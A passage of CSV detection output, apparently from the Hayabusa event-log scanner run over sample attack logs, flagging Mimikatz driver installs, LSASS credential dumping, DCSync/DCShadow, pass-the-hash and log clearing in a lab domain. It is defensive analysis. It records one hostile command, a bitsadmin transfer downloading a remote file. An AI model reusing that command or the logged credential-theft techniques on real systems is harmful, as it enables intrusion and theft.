WIN10-CLIENT01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx +2021-02-22 22:18:08.605 +00:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-22 22:18:08.605 +00:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx +2021-02-22 22:35:11.993 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-22 22:35:20.786 +00:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx +2021-02-22 22:57:19.435 +00:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx +2021-02-22 23:07:20.794 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-02-22 23:07:20.794 +00:00,jump01.offsec.lan,4688,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_builtin/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-02-22 23:07:21.043 +00:00,jump01.offsec.lan,3,low,Evas | Persis,Suspicious Task Added by Bitsadmin,,rules/sigma/builtin/bits_client/win_bits_client_susp_use_bitsadmin.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-02-22 23:07:21.231 +00:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx +2021-02-22 23:08:02.534 +00:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx +2021-03-03 10:24:12.402 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-03 10:33:48.102 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-15 18:49:21.017 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:49:23.184 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:52:31.347 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:52:33.804 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:53:18.009 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:53:51.796 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:53:52.751 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:54:15.647 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 18:55:38.049 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-15 19:01:32.985 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2021-03-16 15:50:54.591 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-25 21:56:19.530 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:19.530 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:32.794 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:32.794 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:50.874 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:50.874 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:53.090 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:56:53.090 +00:00,FX-BS7,4688,medium,CredAccess,Use of PktMon.exe,,rules/sigma/process_creation_builtin/proc_creation_win_lolbin_pktmon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:57:05.324 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-25 21:57:11.415 +00:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx +2021-03-26 16:12:22.200 +00:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:12:22.200 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:12:22.200 +00:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:12:22.201 +00:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx +2021-03-26 16:17:29.210 +00:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:17:35.489 +00:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:17:35.489 +00:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:17:35.489 +00:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx +2021-03-26 16:17:35.490 +00:00,jump01.offsec.lan,4697,info,Persis,Service Installed,Name: mimidrv | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | User: admmig | SrvAccount: LocalSystem | SrvType: 0x1 | SrvStartType: 2 | LID: 0xcc3c3,rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:17:35.490 +00:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:17:35.490 +00:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx +2021-03-26 16:36:00.106 +00:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:36:00.829 +00:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:36:00.829 +00:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:36:00.829 +00:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx +2021-03-26 16:59:24.880 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-26 16:59:24.892 +00:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx +2021-03-26 20:41:38.966 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-03-26 20:41:38.988 +00:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1207-Rogue domain controller/ID4662-Sensitive attributes accessed (DCshadow).evtx +2021-03-26 20:41:39.009 +00:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx +2021-04-20 20:32:55.368 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:32:55.368 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.296 +00:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.305 +00:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.306 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:00.384 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:01.944 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:01.944 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:01.944 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:13.741 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:13.741 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:13.741 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.273 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.273 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.273 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.860 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: | Process: | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx +2021-04-20 20:33:14.861 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.17:137 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 